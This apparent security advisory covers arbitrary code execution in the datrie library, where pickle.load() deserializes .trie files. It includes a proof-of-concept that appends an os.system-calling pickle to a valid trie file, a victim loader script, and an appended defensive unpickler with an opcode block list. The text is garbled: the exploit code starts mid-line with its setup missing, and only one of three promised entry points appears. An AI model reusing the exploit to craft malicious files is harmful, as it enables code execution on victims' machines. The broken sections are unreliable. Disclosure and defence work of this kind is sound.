# Vulnerability Summary: datrie.Trie Arbitrary Code Execution

## 1. Vulnerability Overview

The `Trie` class within the `datrie` library uses the unsafe `pickle.load()` method to deserialize internal data when loading `.trie` files via `Trie.load()`. The same vulnerability exists in the `Trie.read()` and `Trie.__setstate__()` methods. This allows an attacker to craft a malicious `.trie` file that triggers arbitrary Python code execution when a victim loads it.

## 2. Scope of Impact

* **Affected Package:** datrie
* **Affected Versions:** All versions up to and including 0.8.3
* **CWE ID:** CWE-502 - Deserialization of Untrusted Data
* **Severity:** Critical
* **Impact:** Arbitrary Code Execution
* **Researcher Name:** Dhabaleswar Das
* **Discovery Date:** 2026-03-21

## 3. Vulnerable Code

The vulnerability primarily exists at the following three entry points:

**1. Trie.__setstate__ (Line 678)**

```python
def __setstate__(self, bytes_state):
    assert self._c_trie is NULL
    with tempfile.NamedTemporaryFile() as f:
        f.write(bytes_state)
        f.flush()
        f.seek(0)
        self._c_trie = _load_from_file(f)
        # Sink: the bytes following the trie structure are unpickled without
        # any restriction, so whoever produced the file controls what runs here.
        self._values = pickle.load(f)
```

```python
# /tmp/proof.txt'
        return (os.system, (cmd,))

evil_values = [Exploit()]
evil_pickle_data = pickle.dumps(evil_values)

# Step D: Combine into one file: valid trie + evil pickle
with open('/tmp/evil_dictionary.trie', 'wb') as f:
    f.write(trie_binary_data)
    f.write(evil_pickle_data)

print("Malicious file created: /tmp/evil_dictionary.trie")
print("This file looks like a normal trie dictionary file.")
print("When someone loads it, it will secretly run a command.")
```

**Victim Script (victim_app.py)**

This script simulates a normal user loading a `.trie` file, triggering the vulnerability.

```python
import datrie

print("=== Normal Application ===")
print("Loading dictionary file...")
print()

# This is what any normal user would do.
# They received a .trie file and want to use it.
# They have NO idea this will execute code.
try:
    trie = datrie.Trie.load('/tmp/evil_dictionary.trie')
    print("Trie loaded. Keys:", list(trie.keys()))
except Exception as e:
    print("Trie loading had an error:", e)
    print("BUT - check if the command already ran!")

print()
print("=== Checking if attacker's code executed ===")
try:
    with open('/tmp/proof.txt', 'r') as f:
        content = f.read().strip()
    print("RESULT: VULNERABLE!")
    print("The file /tmp/proof.txt now contains:", content)
    print("The attacker's code ran just by loading a .trie file!")
except FileNotFoundError:
    print("RESULT: Not vulnerable (proof file was not created)")
```
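The root cause is that `pickle.load()` resolves and calls whatever globals the stream names. As an added example that is not part of this advisory or of the datrie project, the loader below shows the two defensive layers a safe replacement for the `_values` deserialization needs: a static scan of the pickle opcodes with `pickletools` (which never executes the stream) and an `Unpickler` whose `find_class` refuses every global lookup. All function names and the sample streams are constructed here for illustration.

```python
import io
import pickle
import pickletools
import datetime

# Opcodes that let a pickle stream resolve or invoke Python callables.
# A pickle holding only str/bytes/int/float/list/tuple/dict never needs them.
CALLABLE_OPCODES = frozenset({
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ",
    "NEWOBJ_EX", "BUILD", "EXT1", "EXT2", "EXT4",
})

def suspicious_opcodes(blob: bytes) -> list:
    """Disassemble the stream WITHOUT executing it; list callable-capable opcodes."""
    found = []
    try:
        for opcode, _arg, _pos in pickletools.genops(blob):
            if opcode.name in CALLABLE_OPCODES:
                found.append(opcode.name)
    except Exception:
        found.append("MALFORMED")   # truncated or corrupt stream: treat as untrusted
    return found

class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so no callable can be reached."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def load_values_safely(blob: bytes):
    """Two layers: static opcode scan first, then a restricted unpickler."""
    bad = suspicious_opcodes(blob)
    if bad:
        raise pickle.UnpicklingError(f"refusing pickle with opcodes {sorted(set(bad))}")
    return DataOnlyUnpickler(io.BytesIO(blob)).load()

def try_load(blob: bytes):
    """Return (ok, value_or_reason) so a loader can log and fall back instead of crashing."""
    try:
        return True, load_values_safely(blob)
    except pickle.UnpicklingError as exc:
        return False, str(exc)

# Constructed sample streams (not taken from any real .trie file):
SAFE_BLOB = pickle.dumps(["word", 3, b"\x01", {"k": (1, 2)}])   # plain data only
REDUCE_BLOB = pickle.dumps(datetime.date(2024, 1, 1))           # benign, but uses REDUCE

if __name__ == "__main__":
    print("safe blob  :", try_load(SAFE_BLOB))
    print("reduce blob:", try_load(REDUCE_BLOB))
```

Because datrie lets callers store arbitrary Python objects as values, a data-only policy will reject legitimate files whose values are custom classes; the robust fix is to stop using pickle for the values segment altogether and switch to a data-only format such as JSON.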